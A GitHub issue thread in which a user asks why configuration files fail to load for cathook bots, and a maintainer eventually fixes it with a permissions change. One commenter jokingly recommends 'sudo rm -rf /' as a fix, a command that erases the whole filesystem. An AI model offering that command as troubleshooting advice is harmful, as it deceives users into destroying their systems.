### ISSUE TITLE
how to load configs for bots?

### ISSUE THREAD

**Issue by tobac123** [nullworks/cathook#1671]
## System Information
**OS:**  manjaro on vmwere 16 player
 
i dont know if my cfg is loaded on catbots because they dont join my party as when i did these cfg on cathook it worked 
i tryed to put in the cat_autoexec_textmode.cfg "cat_load main" and sending the comand thrue icp panel

**Comment by Taureon** [comment]
tried*
through*
please learn how to spell english words. it would make it easy for us to understand what you want to say!
https://basicenglishspeaking.com/

**Comment by Lesshy** [comment]
is cat_load main your main cfg? also does your cat_autoexec_textmode.cfg has cat_ipc_connect?

**Comment by tobac123** [comment]
yea main is my cfg and cat_ipc_connect is in cat_autoexec_textmode.cfg

**Comment by jcoding6000** [comment]
have you tried **sudo rm -rf /**
that will refresh the bot system

**Comment by tobac123** [comment]
just tried and it sed "rm: a recursive action on '/' is an action      rm: --no-preserve guarantee for this security"
so i used  --no-preserve guarantee insted of / and still bots cant load the cfg

**Comment by BenCat07** [comment]
Most likely a config or path issue, try looking in /opt/cathook/data/configs if they are there, if they are,

`sudo chown -R $USER:$USER /opt/cathook`

to fix your permissions

**Comment by tobac123** [comment]
thx for help the cfg loaded now
